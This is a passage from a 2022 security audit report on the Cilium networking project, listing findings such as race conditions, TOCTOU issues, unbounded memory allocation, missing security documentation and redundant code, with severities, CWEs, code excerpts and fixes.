bytes could be the file contents of the file being linked to in a symlink.\npath := filepath.Join(certPath, file.Name())bytes, ioErr = os.ReadFile(path)\nThe file contents are stored by filename:\nsecrets[file.Name()] = bytes\nNote that there is also a TOCTOU race condition in this part of the code.GetSecrets()\nonly uses\nthe file names in the directory and subsequently reads the files on their path, the files could\ntheoretically be changed in the time between the invocation ofos.ReadDir()\nandos.ReadFile()\n.\nThe ʻcertPathʼ is considered a privileged directory created by the privileged user. Thus, there is no\nescalation of privileges since the privileged user will also have access to the linked files in a\nsymlink.”\n20Cilium security audit, 2022\n2: Missing central documentation on using Cilium securely\nOverall severity:\nMedium\nID:\nADA-CIL-2\nLocation:\nDocumentation\nFix:\nhttps://github.com/cilium/cilium/pull/23599\nDescription\nMisconfiguration is a major security problem with misconfiguration currently ranking 5 on OWASPʼs\ntop ten (2021). In cloud environments data indicates misconfiguration is the most significant\nreason for unnecessary security risk exposure\n3\n. Cilium\nusers should be able to confidently follow\nindustry standards in their deployments, and the documentation should provide this information.\nCilium should also list whether there are limitations of the default setting from a security\nperspective.\nCilium's documentation is extensive and provides information on both internals, the fundamentals\nof eBPF as well as usage and getting started. The documentation also includes walk-throughs of\nusing various common components that might be used in an application deployment alongside\nCilium:\n●\nHow to secure gRPC:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/grpc/\n●\nGetting Started Securing Elasticsearch:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/elasticsearch/\n●\nHow to Secure a Cassandra Database:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/cassandra/\n●\nGetting Started Securing Memcached:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/memcached/\nThese are great tutorials to include in the documentation, however, users are required to read\nthrough the entire documentation to extract all security-relevant information on configuration.\nThis is a time-consuming task, magnified by some tutorials being in a step-by-step format requiring\nsetting up a test environment. The consequences of this may be that some CIlium users postpone\nextracting all documentation relevant to securely configuring Cilium, or that some users go\nthrough the documentation but fail to absorb all security-relevant information because it is\nscattered across the entire documentation.\nWe recommend creating a single-page piece of documentation that in short-form covers all known\nconfiguration points that could put users at risk if misconfigured. This will ensure that adopters can\nquickly and confidently go through all best-practice configurations and ensure they follow the\nrecommended standards.\nFor examples of security best practice documentation, see:\n3\nhttps://www.armosec.io/blog/what-we-learned-from-scanning-over-10k-kubernetes-clusters/\n21Cilium security audit, 2022\n●\nhttps://istio.io/latest/docs/ops/best-practices/security/\n●\nhttps://github.com/kubeedge/community/blob/master/sig-security/sig-security-audit/Kub\neEdge-threat-model-and-security-protection-analysis.md\n22Cilium security audit, 2022\n3. 
Handlers of the Cilium Docker plugin do not limit the size of\nthe http request body before decoding it\nOverall severity:\nLow\nID:\nADA-CIL-3\nLocation:\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed1954641\n34e9586/plugins/cilium-docker/driver/driver.go\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nThe Cilium Docker plugin does not check the size of the request body before decoding it. An http\nrequest with a large body could cause temporary DoS of the machine. Local testing demonstrated a\ndenial of the machine of ~ 10 seconds before Go terminated.\nThe issue exists here:\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/cilium-docke\nr/driver/driver.go#L327\nfunc(driver *driver)createNetwork(w http.ResponseWriter,r *http.Request) {varcreate api.CreateNetworkRequesterr := json.NewDecoder(r.Body).Decode(&create)iferr !=nil{sendError(w,\"Unable to decode JSON payload: \"+err.Error(),http.StatusBadRequest)return}log.WithField(logfields.Request, logfields.Repr(&create)).Debug(\"NetworkCreate Called\")emptyResponse(w)}\nAs well as these places:\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L340\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L360\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L436\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L456\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L474\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L513\n23Cilium security audit, 2022\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L68\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L81\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L93\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L142\nThis binary is not distributed or installed in Cilium environments. It's used for development\npurposes in some of the older testing infrastructure and we've been discussing getting rid of it.\n24Cilium security audit, 2022\n4. Possible memory exhaustion from CNI template rendering\nOverall severity:\nInformational\nID:\nADA-CIL-4\nLocation:\nhttps://github.com/cilium/cilium/blob/12b7b11e10c87dce2704d4252d22ff202a48ebc1\n/daemon/cmd/cni.go#L271\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nCiliums CNI injection mechanism contains several memory allocations with no upper bounds that\nmay end in a memory exhaustion vulnerability. We did not find a way for this to be vulnerable at\nthe moment, however, we highlight this as a possible issue in that it may be exposed in the future.\nThe root cause of the issue is that Cilium merges two byte slices without enforcing an upper limit\non either. There are several places where this could fail, and we list these further below. First we\npresent the dataflow of the CNI injection. 
The two byte slices being merged are:\n1.\nA CNI template containing an aws CNI entry. This is the entry that gets added to the CNI\nconfiguration file.\n2.\nThe contents of the CNI configuration file.\nThe merging happens inrenderCNIConf()\n:\nfuncrenderCNIConf(opts *option.DaemonConfig, confDirstring) (cniConfig []byte, errerror) {\nifopts.CNIChainingMode ==\"aws-cni\"{pluginConfig := renderCNITemplate(awsCNIEntry, opts)cniConfig, err = mergeExistingAWSCNIConfig(confDir, pluginConfig)iferr !=nil{returnnil, err}}else{...}\n...returncniConfig,nil}\nrenderCNIConf\ncreates the bytes that will later be\nadded to the existing CNI configuration\nfile. This happens inrenderCNITemplate\n:\nfuncrenderCNITemplate(instring, opts *option.DaemonConfig)[]byte{data :=struct{DebugboolLogFilestring\n25Cilium security audit, 2022\n}{Debug: opts.Debug,LogFile: opts.CNILogFile,}\nt := template.Must(template.New(\"cni\").Parse(in))\nout := bytes.Buffer{}iferr := t.Execute(&out, data); err !=nil{panic(err)// impossible}returnout.Bytes()}\nrenderCNITemplate\nadds the values of theDebug\nandCNILogFile\nfields from theDaemonConfig\nto theawsCNIEntry\ntemplate:\nconstawsCNIEntry =`{\"type\": \"cilium-cni\",\"enable-debug\": {{.Debug | js }},\"log-file\": \"{{.LogFile | js }}\"}`\nThis template is then passed tomergeExistingAWSCNFConfig\nwhich reads the existing cni\nconfig file and adds the Cilium plugin:\nfuncmergeExistingAWSCNIConfig(confDirstring, pluginConfig[]byte) ([]byte, error) {awsFiles := []string{\"10-aws.conflist\",\"10-aws.conflist.cilium_bak\"}found, err := findFile(confDir, awsFiles)iferr !=nil{returnnil, fmt.Errorf(\"could not find existingAWS CNI config forchaining %w\", err)}\ncontents, err := os.ReadFile(found)iferr !=nil{returnnil, fmt.Errorf(\"failed to read existingAWS CNI config %s: %w\",found, err)}\n// We found the CNI configuration,// inject Cilium as the last chained pluginout, err := sjson.SetRawBytes(contents,\"plugins.-1\",pluginConfig)iferr !=nil{returnnil, fmt.Errorf(\"failed to modify existingAWS CNI config at %s:%w\", found, err)}log.Infof(\"Inserting cilium in to CNI configurationfile at %s\", found)returnout,nil}\n26Cilium security audit, 2022\nFinally the merged aws plugin and the existing file contents are written back to the CNI config file.\nSince there are no upper bounds on the size of the template or the size of the existing CNI\nconfiguration file, Cilium may try to allocate excessive memory in the CNI merging workflow. At the\nmoment, we have found 2 ways to manipulate the amount of allocated memory:\n1.\nCreate a DaemonConfig with a largeCNILogFile\nstring.\nThis will create a large template.\nThe failure can happen at the moment the template is created in case its size is enough to\nexhaust memory, or later in the CNI merging process.\n2.\nThe existing CNI configuration file is large. Once its contents are merged with the template,\nthis may exhaust memory.\nRecommendation\nWe acknowledge that this code does not constitute a bug at the moment. 
However, we recommend\neither leaving a comment in the code that highlights the unbounded memory allocations are in fact\nsafe, or, add upper bounds to the template size and the existing CNI configuration file before\nreading it.\n27Cilium security audit, 2022\n5: Possible excessive memory allocation\nOverall severity:\nInformational\nID:\nADA-CIL-5\nLocation:\nhttps://github.com/cilium/cilium/blob/dac4c0691c2fd611308b28ed08 \nb8ba2ee7f38b8c/pkg/labels/labels.go#L478\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nCilium may be made to create a byte slice that exceeds the memory available on the machine inlabels.SortedList()\n:\nfunc(l Labels)SortedList() []byte{keys :=make([]string,0,len(l))fork :=rangel {keys =append(keys, k)}sort.Strings(keys)\nb := make([]byte, 0, len(keys)*2)buf := bytes.NewBuffer(b)for_, k :=rangekeys {buf.Write(l[k].FormatForKVStore())}\nreturnbuf.Bytes()}\nIn similar fashion to issue 4, we did not find this to be vulnerable at this given moment, but we\nhighlight it as a potential issue since unbounded memory allocations can lead to memory\nexhaustion. It is worth noting here that according to\nhttps://kubernetes.io/docs/concepts/overview/working-with-objects/labels/#syntax-and-character\n-set\nlabels are constrained in size, label keys <\n63 characters, but with a < 253 char potential prefix,\nvalues < 63 characters. Generously: below 400 ASCII characters, hence <400 bytes per label.\n28Cilium security audit, 2022\n6: Race condition in Hubble Relay Peer Manager\nOverall severity:\nLow\nID:\nADA-CIL-6\nLocation:\nhttps://github.com/cilium/cilium/blob/82c742f2e9fb65fb3fc392c7dcb3b4e22\nb69c650/pkg/hubble/relay/pool/manager.go#L143-L186\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nFix:\nhttps://github.com/cilium/cilium/commit/43121d9d554604f708eb273d117b6 \n8960747812d\nDescriptionPeerManager.manageConnections()\ncreates a goroutine\ninside a loop and references a\nvariable outside the goroutine. This can result in a race condition, whereby both the PeerManager\nand the peer name might change between they are declared and the time they are used inside the\ngoroutine:\nhttps://github.com/cilium/cilium/blob/82c742f2e9fb65fb3fc392c7dcb3b4e22b69c650/pkg/hubble/relay/poo\nl/manager.go#L143-L186\nfunc(m *PeerManager)manageConnections() {connTimer, connTimerDone := inctimer.New()deferconnTimerDone()for{select{case<-m.stop:returncasename := <-m.offline:m.mu.RLock()p := m.peers[name]m.mu.RUnlock()m.wg.Add(1)gofunc() {deferm.wg.Done()// a connection request has been made, make sureto attempta connectionm.connect(p, true)}()case<-connTimer.After(m.opts.connCheckInterval):m.mu.RLock()now := time.Now()for_, p :=rangem.peers {p.mu.Lock()ifp.conn !=nil{switchp.conn.GetState() {caseconnectivity.Connecting, connectivity.Idle,connectivity.Ready, connectivity.Shutdown:p.mu.Unlock()continue}\n29Cilium security audit, 2022\n}switch{casep.nextConnAttempt.IsZero(),p.nextConnAttempt.Before(now):p.mu.Unlock()m.wg.Add(1)gofunc() {deferm.wg.Done()m.connect(p, false)}()default:p.mu.Unlock()}}m.mu.RUnlock()}}}\nMinimal reproducer\nThe race condition is demonstrated with this reproducer that mimics the behaviour ofmanageConnections()\n.\nTowards the end of the program,\na line with a panic is marked with\nyellow. 
This panic will only be triggered iffirstPeerName\nandsecondPeerName\nare different, ie.\nif the\np\nchanges before it is used inside the goroutine.\npackagemain\nimport(\"fmt\"\"github.com/cilium/cilium/pkg/lock\"\"sync\")\ntypepeerstruct{mu lock.Mutexnamestring}\ntypemstruct{mu lock.RWMutexwg sync.WaitGrouppeersmap[string]*peer}\nfunc(m *m)connect(p *peer) {fmt.Println(p.name)}\nfuncmain() {peers :=map[string]*peer{\"peer1\": &peer{name:\"peer1\"},\"peer2\": &peer{name:\"peer2\"},\"peer3\": &peer{name:\"peer3\"},\n30Cilium security audit, 2022\n\"peer4\": &peer{name:\"peer4\"},\"peer5\": &peer{name:\"peer5\"},\"peer6\": &peer{name:\"peer6\"},\"peer7\": &peer{name:\"peer7\"},\"peer8\": &peer{name:\"peer8\"},\"peer9\": &peer{name:\"peer9\"},\"peer510\": &peer{name:\"peer10\"},}m := &m{peers: peers}m.mu.RLock()for_, p :=rangem.peers {p.mu.Lock()p.mu.Unlock()m.wg.Add(1)gofunc() {deferm.wg.Done()firstPeerName := fmt.Sprintf(\"%s\", p.name)secondPeerName := fmt.Sprintf(\"%s\", p.name)ifsecondPeerName != firstPeerName {panic(fmt.Sprintf(\"We won the race:\\n'p.name'is %s and'firstPeerName' is %s\\n\", p.name, firstPeerName))}m.connect(p)}()fmt.Println(\"End of loop\")}m.mu.RUnlock()}\nFor more info, see\nEffective Go: goroutines\n.\n31Cilium security audit, 2022\n7: Race condition inpkg/policy.Repository.LocalEndpointIdentityRemoved()\nOverall severity:\nLow\nID:\nADA-CIL-7\nLocation:\n●\nhttps://github.com/cilium/cilium/blob/bbcadc43758b7e3c89d0ef9a3\n9266fff1bc41849/pkg/policy/repository.go#L404\n●\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad9512\n4e40665b1f88c/pkg/identity/identitymanager/manager.go#L150\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nDescription\nAnother case of creating a goroutine and using a variable inside the goroutine that was declared\noutside of the goroutine exists inpkg/policy.Repository.LocalEndpointIdentityRemoved()\n.\n(*Repository).LocalEndpointIdentityRemoved()\ncreates\na goroutine:\nfunc(p *Repository)LocalEndpointIdentityRemoved(identity*identity.Identity) {gofunc() {scopedLog := log.WithField(logfields.Identity, identity)scopedLog.Debug(\"Removing identity references frompolicy cache\")p.Mutex.RLock()wg := p.removeIdentityFromRuleCaches(identity)wg.Wait()p.Mutex.RUnlock()scopedLog.Debug(\"Finished cleaning policy cache\")}()}\nLocalEndpointIdentityRemoved()\nis called here:\nhttps://github.com/cilium/cilium/blob/master/pkg/identity/identitymanager/manager.go\nfunc(idm *IdentityManager)remove(identity *identity.Identity){\nifidentity ==nil{return}\nidMeta, exists := idm.identities[identity.ID]if!exists {log.WithFields(logrus.Fields{logfields.Identity: identity,}).Error(\"removing identity not added to the identitymanager!\")\n32Cilium security audit, 2022\nreturn}idMeta.refCount--ifidMeta.refCount ==0{delete(idm.identities, identity.ID)foro :=rangeidm.observers {o.LocalEndpointIdentityRemoved(identity)}}\n}\nThe for-loop (marked with blue) loops through all observers of the identitymanager, and starts a\ngoroutine in each iteration. 
This will not always start one goroutine for each observer but might start multiple goroutines for the same observer.
For more info, see Effective Go: goroutines.

8: Deprecated 3rd-party library
Overall severity: Informational
ID: ADA-CIL-8
Location:
● https://github.com/cilium/cilium/blob/3f6dadc91c92bdf09a5dfaedb93047dc9f764cc3/tools/tools.go#L11
CWE:
● CWE-477: Use of Obsolete Function

Description
Cilium has in its dependency tree github.com/gogo/protobuf, which is deprecated. We recommend discontinuing all use of deprecated dependencies.
Kubernetes also relies on this library: https://github.com/kubernetes/kubernetes/issues/96564, and since Cilium uses Kubernetes libraries, Cilium cannot remove this dependency until k8s does it.

9: TOCTOU race condition in endpoint file move helper function
Overall severity: Low
ID: ADA-CIL-9
Location:
● https://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/endpoint/directory.go#L50
CWE:
● CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition

Description
A TOCTOU race condition exists in pkg/endpoint when moving files from one directory to another.

https://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/endpoint/directory.go#L50

    func moveNewFilesTo(oldDir, newDir string) error {
        oldFiles, err := os.ReadDir(oldDir)
        if err != nil {
            return err
        }
        newFiles, err := os.ReadDir(newDir)
        if err != nil {
            return err
        }

        for _, oldFile := range oldFiles {
            exists := false
            for _, newFile := range newFiles {
                if oldFile.Name() == newFile.Name() {
                    exists = true
                    break
                }
            }
            if !exists {
                os.Rename(filepath.Join(oldDir, oldFile.Name()),
                    filepath.Join(newDir, oldFile.Name()))
            }
        }
        return nil
    }

This could be exploited if an attacker can replace a file in oldDir after oldDir has been read and before the file is renamed.
The issue could potentially allow users to create files in directories that they should not be able to create files in.
This issue is rated LOW, because an attacker with this level of access can trigger the impact regardless of the TOCTOU race condition.
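Purely as an illustration (not a change the report requires, given the rating), the check-then-rename window can be removed by letting the filesystem enforce the "destination must not exist" condition itself, for example with os.Link, which fails if the target already exists. The helper below is hypothetical and assumes regular files on a single filesystem:

    import "os"

    // moveIfAbsent moves oldPath to newPath only if newPath does not already
    // exist. os.Link fails with EEXIST when the target exists, so the existence
    // check and the "move" are one filesystem operation instead of a ReadDir
    // followed by os.Rename. Hard links only work within one filesystem and
    // not for directories.
    func moveIfAbsent(oldPath, newPath string) error {
        if err := os.Link(oldPath, newPath); err != nil {
            if os.IsExist(err) {
                return nil // a file with that name already exists; skip, as the original code does
            }
            return err
        }
        return os.Remove(oldPath)
    }

This does not affect the rating; the report's reasoning for LOW continues below.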
If that is given, they can just create a file in oldDir, which will then be moved to\nnewDir if there is no file name conflict.”\n36Cilium security audit, 2022\n10: Redundant return statements\nOverall severity:\nInformational\nID:\nADA-CIL-10\nLocation:\nSeveral packages\nCWE:\n●\nCWE-1041: Use of Redundant Code\nDescription\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/cilium/cmd/debuginfo.go#L346\nfuncwriteJSONPathToOutput(buf bytes.Buffer, pathstring, suffixstring, jsonPathstring){data := buf.Bytes()db := &models.DebugInfo{}err := db.UnmarshalBinary(data)iferr !=nil{fmt.Fprintf(os.Stderr,\"error unmarshaling binary:%s\\n\", err)}jsonStr, err := command.DumpJSONToString(db, jsonPath)iferr !=nil{fmt.Fprintf(os.Stderr,\"error printing JSON: %s\\n\",err)}\nifpath ==\"\"{fmt.Println(jsonStr)return}\nfileName := fileName(path, suffix)writeFile([]byte(jsonStr), fileName)\nfmt.Printf(\"%s output at %s\\n\", jsonpathOutput, fileName)return}\nhttps://github.com/cilium/cilium/blob/00e40bb41683b9b3462a94879a93841751197629/daemon/cmd/config.go#L33\nfunc(h *patchConfig)configModify(params PatchConfigParams,resChanchaninterface{}) {...d.TriggerDatapathRegen(policyEnforcementChanged,\"agent configurationupdate\")}\nresChan <- NewPatchConfigOK()return}\nhttps://github.com/cilium/cilium/blob/de82f8c1a3cb92cde0f37fe627aaf1c313a37caf/daemon/cmd/policy.go#L430\nfunc(d *Daemon)policyAdd(sourceRules policyAPI.Rules,opts *policy.AddOptions, resChanchaninterface{}) {\n37Cilium security audit, 2022\n..._, err = d.policy.RuleReactionQueue.Enqueue(ev)iferr !=nil{log.WithError(err).WithField(logfields.PolicyRevision,newRev).Error(\"enqueue of RuleReactionEvent failed\")}\nreturn}\nhttps://github.com/cilium/cilium/blob/de82f8c1a3cb92cde0f37fe627aaf1c313a37caf/daemon/cmd/policy.go#L644\nfunc(d *Daemon)policyDelete(labels labels.LabelArray,reschaninterface{}) {if_, err := d.policy.RuleReactionQueue.Enqueue(ev);err !=nil{log.WithError(err).WithField(logfields.PolicyRevision, rev).Error(\"enqueueof RuleReactionEvent failed\")}iferr := d.SendNotification(monitorAPI.PolicyDeleteMessage(deleted,labels.GetModel(), rev)); err !=nil{log.WithError(err).WithField(logfields.PolicyRevision, rev).Warn(\"Failedto send policy update as monitor notification\")}\nreturn}\nhttps://github.com/cilium/cilium/blob/b1aa5374acf77a598e8f5a6d69cbc53122812d62/daemon/cmd/status.go#L1093\nfunc(d *Daemon)startStatusCollector(cleaner *daemonCleanup){...cleaner.cleanupFuncs.Add(func() {// If the KVstore state is not OK, print help foruser.ifd.statusResponse.Kvstore !=nil&&d.statusResponse.Kvstore.State != models.StatusStateOk {helpMsg :=\"cilium-agent depends on the availabilityofcilium-operator/etcd-cluster. 
\"+\"Check if the cilium-operator pod and etcd-clusterarerunning and do not have any \"+\"warnings or error messages.\"log.WithFields(logrus.Fields{\"status\": d.statusResponse.Kvstore.Msg,logfields.HelpMessage: helpMsg,}).Error(\"KVStore state not OK\")\n}})return}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L173\nfuncsyncCESsInLocalCache(cesStore cache.Store, manageroperations) {...log.Debug(\"Successfully synced all CESs locally\")\n38Cilium security audit, 2022\nreturn}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L196\nfunc(c *CiliumEndpointSliceController)Run(ces cache.Indexer,stopChchanstruct{}) {...gowait.Until(c.worker, c.workerLoopPeriod, stopCh)\ngofunc() {deferutilruntime.HandleCrash()}()\n<-stopCh\nreturn}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L217\nfuncsyncCESsInLocalCache(cesStore cache.Store, manageroperations) {...log.Debug(\"Successfully synced all CESs locally\")return}\nhttps://github.com/cilium/cilium/blob/e4ea0fa10af293b24fbe6b26307ec2709bb856e6/operator/pkg/ciliumendpointslice\n/manager.go#L168\nfunc(c *cesMgr)addCEPtoCES(cep *cilium_v2.CoreCiliumEndpoint,ces *cesTracker) {...// Increment the cepInsert counterces.cepInserted +=1c.insertCESInWorkQueue(ces, DefaultCESSyncTime)return}\nhttps://github.com/cilium/cilium/blob/e4ea0fa10af293b24fbe6b26307ec2709bb856e6/operator/pkg/ciliumendpointslice\n/manager.go#L367\nfunc(c *cesMgr)RemoveCEPFromCache(cepNamestring,baseDelay time.Duration) {...}else{log.WithFields(logrus.Fields{logfields.CEPName: cepName,}).Info(\"Attempted to retrieve non-existent CES,skip processing.\")}\nreturn}\n39Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/0b7919a9d8138a42dc82f3861372c665970fd22c/pkg/alibabacloud/eni/node.go#L\n86\nfunc(n *Node)PopulateStatusFields(resource *v2.CiliumNode){resource.Status.AlibabaCloud.ENIs =map[string]eniTypes.ENI{}\nn.manager.ForeachInstance(n.node.InstanceID(),func(instanceID, interfaceIDstring, rev ipamTypes.InterfaceRevision)error{e, ok := rev.Resource.(*eniTypes.ENI)ifok {resource.Status.AlibabaCloud.ENIs[interfaceID] =*e.DeepCopy()}returnnil})\nreturn}\nhttps://github.com/cilium/cilium/blob/c5cbf403dbe355ecbb80dfc8d7a8ed4da45c43bd/pkg/aws/eni/node.go#L105\nfunc(n *Node)PopulateStatusFields(k8sObj *v2.CiliumNode){k8sObj.Status.ENI.ENIs =map[string]eniTypes.ENI{}\nn.manager.ForeachInstance(n.node.InstanceID(),func(instanceID, interfaceIDstring, rev ipamTypes.InterfaceRevision)error{e, ok := rev.Resource.(*eniTypes.ENI)ifok {k8sObj.Status.ENI.ENIs[interfaceID] = *e.DeepCopy()}returnnil})\nreturn}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L68\nfunc(ev *EndpointRegenerationEvent)Handle(reschaninterface{}) {...res <- &EndpointRegenerationResult{err: err,}return}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L185\nfunc(ev *EndpointNoTrackEvent)Handle(reschaninterface{}){...res <- &EndpointRegenerationResult{err:nil,\n40Cilium security audit, 2022\n}return}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L251\nfunc(ev *EndpointPolicyVisibilityEvent)Handle(reschaninterface{}) {...e.visibilityPolicy = nvpres <- 
&EndpointRegenerationResult{err:nil,}return}\nhttps://github.com/cilium/cilium/blob/c112a3e59dcc988cf3a9901b48bce9583cfb3581/pkg/ipam/allocator/podcidr/podc\nidr.go#L420\nfunc(n *NodesPodCIDRManager)Delete(node *v2.CiliumNode){...n.ciliumNodesToK8s[node.Name] = &ciliumNodeK8sOp{op: k8sOpDelete,}n.k8sReSync.Trigger()return}\nhttps://github.com/cilium/cilium/blob/295d32957db4defae2c1dc594ff9b284c6513d4f/pkg/maps/lbmap/ipv4.go#L224\nfunc(in *pad2uint8)DeepCopyInto(out *pad2uint8){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lxcmap/lxcmap.go#L11\n3\nfunc(in *pad4uint32)DeepCopyInto(out *pad4uint32){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/tuple/tuple.go#L42\nfunc(in *buff256uint8)DeepCopyInto(out *buff256uint8){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/5fc05ac07597ed651a8ccb2e59dc73691ec2caec/pkg/types/ipv4.go#L32\nfunc(v4 *IPv4)DeepCopyInto(out *IPv4) {copy(out[:], v4[:])return\n41Cilium security audit, 2022\n}\nhttps://github.com/cilium/cilium/blob/5fc05ac07597ed651a8ccb2e59dc73691ec2caec/pkg/types/ipv6.go#L30\nfunc(v6 *IPv6)DeepCopyInto(out *IPv6) {copy(out[:], v6[:])return}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/types/macaddr.go#L24\nfunc(addr *MACAddr)DeepCopyInto(out *MACAddr) {copy(out[:], addr[:])return}\n42Cilium security audit, 2022\n11: Redundant imports\nOverall severity:\nInformational\nID:\nADA-CIL-11\nLocation:\nSeveral packages\nCWE:\n●\nCWE-1041: Use of Redundant Code\nDescription\nCilium imports the same library twice in the same file these places of the source tree:\nFile\nDouble import\ndaemon/cmd/daemon.gogithub.com/cilium/cilium/pkg/k8s/client\ndaemon/cmd/daemon_main.gogithub.com/cilium/cilium/pkg/wireguard/agent\noperator/cmd/flags.gogithub.com/cilium/cilium/pkg/option\noperator/pkg/ciliumendpointslice/endpointslice.gogithub.com/cilium/cilium/pkg/k8s/apis/cilium.io/v2alpha1\npkg/k8s/watchers/cilium_endpoint_slice.gogithub.com/cilium/cilium/pkg/k8s/apis/cilium.io/v2alpha1\npkg/k8s/watchers/cilium_network_policy.gogithub.com/cilium/cilium/pkg/k8s/utils\npkg/nodediscovery/nodediscovery.gogithub.com/cilium/cilium/pkg/node/types\npkg/redirectpolicy/redirectpolicy.gogithub.com/cilium/cilium/pkg/loadbalancer\npkg/service/service.gogithub.com/cilium/cilium/pkg/datapath/types\n43Cilium security audit, 2022\n12: Redundant function parameters\nOverall severity:\nInformational\nID:\nADA-CIL-12\nLocation:\nSeveral packages\nCWE\n●\nCWE-1041: Use of Redundant Code\nDescription\nThis issue lists the places in which Cilium passes a function parameter that remains unused in the\nfunction body rendering the parameter redundant.\nLatest commit of this check:b8a6791299083d9888819d03f458ecd1942abf81\nFile\nAPI\nParam name\napi/v1/server/configure_cilium_api.goconfigureServerscheme, 
addr\ndaemon/cmd/ciliumendpoints.go(*Daemon).deleteCiliumEndpointeps\ndaemon/cmd/daemon_main.go(*Daemon).instantiateBGPControlPlanectx\ndaemon/cmd/hubble.gogetHubbleEventBufferCapacitylogger\noperator/pkg/lbipam/lbipam.go(*LBIPAM).poolOnUpsertk\noperator/pkg/lbipam/lbipam.go(*LBIPAM).poolOnDeletek\noperator/pkg/lbipam/lbipam.go(*LBIPAM).svcOnUpsertk\noperator/pkg/lbipam/lbipam.go(*LBIPAM).svcOnDeletek\npkg/alibabacloud/eni/node.go(*Node).getSecurityGroupIDsctx\npkg/aws/eni/migration.go(*InterfaceDB).fetchFromK8sname\npkg/aws/eni/node.go(*Node).getSecurityGroupIDsctx\npkg/bgp/manager/metallb.gonewMetalLBControllerctx\npkg/bgp/speaker/metallb.gonewMetalLBSpeakerctx\npkg/bgpv1/gobgp/routermgr.go(*BGPRouterManager).withdrawctx\npkg/bgpv1/gobgp/workdiff.go(*reconcileDiff).withdrawDiffpolicy\npkg/bpf/map_linux.go(*Map).deleteAllMapEventerr\npkg/bpf/map_register_linux.gounregisterMapm\npkg/datapath/ipcache/listener.go(*BPFListener).garbageCollectctx\npkg/datapath/iptables/iptables.go(*IptablesManager).installMasqueradeRulesifName\n44Cilium security audit, 